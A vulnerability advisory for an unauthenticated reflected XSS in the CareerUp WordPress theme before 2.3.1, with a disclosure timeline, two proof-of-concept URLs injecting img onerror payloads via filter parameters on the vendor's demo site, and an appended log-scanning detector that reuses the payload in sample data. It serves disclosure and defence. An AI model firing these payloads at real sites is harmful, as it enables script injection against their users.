CareerUp < 2.3.1 - Unauthenticated Reflected Cross-Site Scripting

2020-07-03T00:00:00
ID WPEX-ID:10289
Type wpexploit
Reporter Daniel Ruf
Modified 2020-07-04T05:00:06

Description

There are unauthenticated reflected Cross-Site Scripting (XSS) vulnerabilities in the CareerUp theme, via the filter parameters.

Edit (WPScanTeam):
May 27th, 2020 - Vendor contacted by original submitter.
May 29th, 2020 - v2.3.0 released. Unclear if issue fixed.
June 18th, 2020 - Another submitter (Vlad Vector) reported the same issue. Report escalated to Envato.
June 18th, 2020 - v2.3.1 released. Issue confirmed to be fixed.

https://apusthemes.com/wp-demo/careerup/jobs/?filter-title=%22%3E%3Cimg+src%3Dx+onerror%3Dalert%281%29%3E&filter-center-location=&filter-center-latitude=&filter-center-longitude=&filter-distance=50

https://apusthemes.com/wp-demo/careerup/jobs/?filter-title=%22%3E%3Cimg%20src=x%20onerror=alert(`XSS`)%3E&filter-center-location=%22%3E%3Cimg%20src=x%20onerror=alert(`XSS2`)%3E&filter-distance=%22%3E%3Cimg%20src=x%20onerror=alert(`XSS3`)%3E
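Added example (not part of the original advisory or the theme's code): a log triage check that flags requests whose `filter-*` query parameters decode to HTML metacharacters, the pattern visible in the URLs above. The log lines are constructed samples in combined log format, and the function names are hypothetical.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Characters that let a reflected value close an attribute or open a tag.
# Heuristic for triage only: a quoted search phrase will also match.
MARKUP = re.compile(r'[<>"]')

# client address and request target from a combined-log-format line
REQUEST = re.compile(r'^(\S+) [^"]*"(?:GET|POST|HEAD) (\S+) HTTP/')

def suspicious_filter_params(request_target):
    """Names of filter-* parameters whose URL-decoded value contains markup."""
    query = urlsplit(request_target).query
    hits = set()
    for name, value in parse_qsl(query, keep_blank_values=True):
        if name.startswith("filter-") and MARKUP.search(value):
            hits.add(name)
    return sorted(hits)

def scan_access_log(lines):
    """Return [(client, [param, ...])] for every line with a flagged request."""
    findings = []
    for line in lines:
        match = REQUEST.match(line)
        if not match:
            continue  # not a request line we understand
        client, target = match.groups()
        params = suspicious_filter_params(target)
        if params:
            findings.append((client, params))
    return findings

# Constructed sample log lines (documentation address ranges, made-up sizes).
SAMPLE_LOG = [
    '198.51.100.4 - - [03/Jul/2020:09:58:11 +0000] '
    '"GET /jobs/?filter-title=nurse&filter-distance=50 HTTP/1.1" 200 18231',
    '203.0.113.7 - - [03/Jul/2020:10:00:02 +0000] '
    '"GET /jobs/?filter-title=%22%3E%3Cimg+src%3Dx+onerror%3Dalert%281%29%3E'
    '&filter-center-location=&filter-distance=50 HTTP/1.1" 200 18407',
    '198.51.100.9 - - [03/Jul/2020:10:01:40 +0000] '
    '"GET /wp-login.php HTTP/1.1" 200 2710',
]

if __name__ == "__main__":
    for client, params in scan_access_log(SAMPLE_LOG):
        print(f"{client}: markup in {', '.join(params)}")
```

Hits from a site running a CareerUp version below 2.3.1 are worth reviewing; on 2.3.1 or later they indicate probing rather than exposure.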